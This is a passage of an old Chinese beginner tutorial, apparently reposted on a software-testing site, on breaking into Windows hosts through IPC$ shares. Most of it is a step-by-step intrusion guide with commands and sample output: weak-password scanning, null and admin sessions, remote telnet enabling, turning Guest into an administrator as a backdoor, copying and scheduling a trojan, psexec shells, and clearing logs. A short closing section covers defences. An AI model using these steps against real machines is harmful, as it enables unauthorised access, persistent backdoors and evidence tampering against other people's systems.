• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: | 推荐给好友 上一篇 | 下一篇

菜鸟必备:ipc$详细解

发布: 2007-6-23 19:14 | 作者:   | 来源:   | 查看: 26次 | 进入软件测试论坛讨论

领测软件测试网

   
  十 一些需要shell才能完成的命令
  
  看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:
  

  1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
  
  2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;
  
  3 运行/关闭远程主机的服务,需要在shell下完成;
  
  4 启动/杀掉远程主机的进程,也需要在shell下完成。
  
  十一 入侵中可能会用到的相关命令
  
  请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。
  
  1 建立空连接:
  net use \IPipc$ "" /user:""
  
  2 建立非空连接:
  net use \IPipc$ "psw" /user:"account"
  
  3 查看远程主机的共享资源(但看不到默认共享)
  net view \IP
  
  4 查看本地主机的共享资源(可以看到本地的默认共享)
  net share
  
  5 得到远程主机的用户名列表
  nbtstat -A IP
  
  6 得到本地主机的用户列表
  net user
  
  7 查看远程主机的当前时间
  net time \IP
  
  8 显示本地主机当前服务
  net start
  
  9 启动/关闭本地服务
  net start 服务名 /y
  net stop 服务名 /y
  
  10 映射远程共享:
  net use z: \IPaby
  此命令将共享名为baby的共享资源映射到z盘
  
  11 删除共享映射
  net use c: /del 删除映射的c盘,其他盘类推
  net use * /del /y删除全部
  
  12 向远程主机复制文件
  copy 路径srv.exe \IP共享目录名,如:
  copy ccbirds.exe \*.*.*.*c 即将当前目录下的文件复制到对方c盘内
  
  13 远程添加计划任务
  at \ip 时间 程序名,如:
  at \127.0.0.0 11:00 love.exe
  注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
  
  14 开启远程主机的telnet
  这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
  
  1)目标开启了ipc$共享
  2)你要拥有管理员密码和帐号
  3)目标开启RemoteRegistry服务,用户就该ntlm认证
  4)对WIN2K/XP有效,NT未经测试
  命令格式:OpenTelnet.exe \server account psw NTLM认证方式 port
  试例如下:c:>OpenTelnet.exe \*.*.*.* administrator "" 1 90
  
  15 激活用户/加入管理员组
  1 net uesr account /active:yes
  2 net localgroup administrators account /add
  
  16 关闭远程主机的telnet
  同样需要一个小程序:ResumeTelnet.exe
  命令格式:ResumeTelnet.exe \server account psw
  试例如下:c:>ResumeTelnet.exe \*.*.*.* administrator ""
  
  17 删除一个已建立的ipc$连接
  net use \IPipc$ /del
  
  十二 ipc$完整入侵步骤祥解
  
  其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!
  
  1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空
  
  2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧
  
  3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
  c:>OpenTelnet.exe \192.168.21.* administrator "" 1 90
  如果返回如下信息
  *******************************************************
  Remote Telnet Configure, by refdom
  Email: refdom@263.net
  OpenTelnet.exe
  
  Usage:OpenTelnet.exe \server username password NTLMAuthor telnetport
  *******************************************************
  Connecting \192.168.21.*...Successfully!
  
  NOTICE!!!!!!
  The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
  
  Starting telnet service...
  telnet service is started successfully! telnet service is running!
  
  BINGLE!!!Yeah!!
  Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
  Disconnecting server...Successfully!
  *说明你已经打开了一个端口90的telnet。
  
  4 现在我们telnet上去
  telnet 192.168.21.* 90
  如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了
  
  5 C:>net user guest /active:yes
  *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no
  
  6 C:>net user guest 1234
  *将Guest的密码改为1234,或者改成你喜欢的密码
  
  7 C:>net localgroup administrators guest /add
  *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。
  
  8 好了,现在我们来走另一条路,给它传个木马玩玩
  
  9 首先,我们先建立起ipc$连接
  C:>net use \192.168.21.*ipc$ "" /user:administrator
  
  10 既然要上传东西,就要先知道它开了什么共享
  C:>net view \192.168.21.*
  在 \192.168.21.*的共享资源
  资源共享名 类型 用途 注释
  
  C Disk
  D Disk
  命令成功完成。
  *好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。
  
  11 C:>copy love.exe \192.168.21.*c
  已复制 1 个文件
  *用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现
  
  12 运行木马前,我们先看看它现在的时间
  net time \192.168.21.*
  \192.168.21.*的当前时间是 2003/8/22 上午 11:00
  命令成功完成
  
  13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
  C:>at \192.168.21.* 11:02 c:love.exe
  新加了一项作业,其作业 ID = 1
  
  14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了
  
  嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
  讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面
  
  十三 如何防范ipc$入侵
  
  1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
  
  方法1:
  运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous = DWORD的键值改为:1
  如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows 2000 中增加了"2",限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。
  
  方法2:
  在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做相应设置
  
  2 禁止默认共享
  
  1)察看本地共享资源
  运行-cmd-输入net share
  
  2)删除共享(重起后默认共享仍然存在)
  net share ipc$ /delete
  net share admin$ /delete
  net share c$ /delete
  net share d$ /delete(如果有e,f,……可以继续删除)
  
  3)停止server服务
  net stop server /y (重新启动后server服务会重新开启)
  
  4)禁止自动打开默认共享(此操作并未关闭ipc$共享)
  运行-regedit
  
  server版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
  
  pro版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000

延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/


关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备10010545号-5
技术支持和业务联系:info@testage.com.cn 电话:010-51297073

软件测试 | 领测国际ISTQBISTQB官网TMMiTMMi认证国际软件测试工程师认证领测软件测试网